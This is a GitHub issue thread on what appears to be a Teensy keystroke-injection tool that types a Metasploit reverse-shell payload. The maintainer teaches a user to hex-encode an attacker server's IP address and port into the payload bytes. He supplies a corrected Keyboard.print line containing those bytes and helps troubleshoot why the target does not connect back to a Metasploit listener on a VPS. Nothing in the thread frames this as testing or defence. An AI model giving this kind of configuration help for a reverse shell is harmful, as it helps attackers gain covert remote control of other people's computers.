### ISSUE TITLE
hex converter

### ISSUE THREAD

**Issue by bostrot** [cry0h/Teensyterpreter#1]
```
// Replace [0x@@,0x@@,0x@@,0x@@] with each part of your IP (in hex).
// Replace [0x@@,0x@@] with your open port (e.g. 65535 = 0xFF,0xFF)
// Don't forget to remove the [] brackets after editing.
```

where can i find a converter for this? if i try an online converter then 65535 = FFFF or 0x36 0x35 0x35 0x33 0x35  and not 0xFF,0xFF why?

**Comment by Cryoganix** [comment]
That conversion is correct.

For the IP set, each portion of the IP address is converted to hex, with each portion being one byte.

For example, if we wanted to use 123.45.67.89:

``` Assembly
123 = 0x7b
45  = 0x2d
67  = 0x43
89  = 0x59
```

Altogether, we get `0x7b,0x2d,0x43,0x59`.

For the port set, the port number is converted into hex and the split into into 2 bytes.

For example, let's take port 443. Since `443 = 0x1bb`, we'll use `0x1bb` as our base.

In order to get the 2 bytes we need, if there are less than 4 digits in the hex value, simply pad (prepend) it with 0 until you hit 4 digits. In this case, we'd pad `0x1bb` to become `0x01bb`.

If we had done port 80, which is `0x50` in hex, then we'd pad it so that it becomes `0x0050`.

Once you've done that, just split it into two bytes.

``` Assembly
0x01bb becomes 0x01,0xbb
0x0050 becomes 0x00,0x50
```

So if we wanted to listen on `123.45.67.89:443`, then our values to plug in would be:

``` Assembly
0x7b,0x2d,0x43,0x59
```

and

``` Assembly
0x01,0xbb
```

I hope I've cleared things up a bit!

**Comment by bostrot** [comment]
yes thanks it helped a lot! but the computer don't connect to the metasploit server when i test it. so if my ip from the metasploit server is: XX.101.171.126 then the hex is: XXXX,0x65,0xab,0x7e then your code ,0x68,0x02,0x00 and then the port 7878: 0x4e,0x4e and yours ,0. is this right? 

so all in all my code looks like this:
Keyboard.print("0xXX,0x65,0xab,0x7e,0x68,0x02,0x00,0x4e,0x4e,0");

**Comment by Cryoganix** [comment]
Almost!

For the port, you have to convert to hex, **then** split it into the 2-byte representation. In the case of port 7878, we'd go through these steps:

``` Assembly
7878 = 0x1ec6
0x1ec6 -> 0x1e, 0xc6
```

In the end, that particular line of code would look like:

``` C
Keyboard.print("0xXX,0x65,0xab,0x7e,0x68,0x02,0x00,0x1e,0xc6,0");
```

**Comment by bostrot** [comment]
ok thanks but it still don't connect to the server. do you have any ideas why?

**Comment by Cryoganix** [comment]
Do you have port forwarding set up and correctly configured on your router?

**Comment by bostrot** [comment]
i installed metasploit on a vps and when i connect via the browser the msf console says sending stage.

**Comment by Cryoganix** [comment]
I'm not sure I'm familiar with your setup. Why are you trying to connect via browser? Additionally, I'd recommend using a local listener for testing purposes.

**Comment by bostrot** [comment]
i tried to connect with my browser cause i wanted to know if my computer can reach the server.

**Comment by Cryoganix** [comment]
So after the script runs, the Metasploit console doesn't give any indication of sending the stage? Also, could you list the steps you're taking to try and achieve the reverse shell? I'd be able to troubleshoot the issue much better with that information.
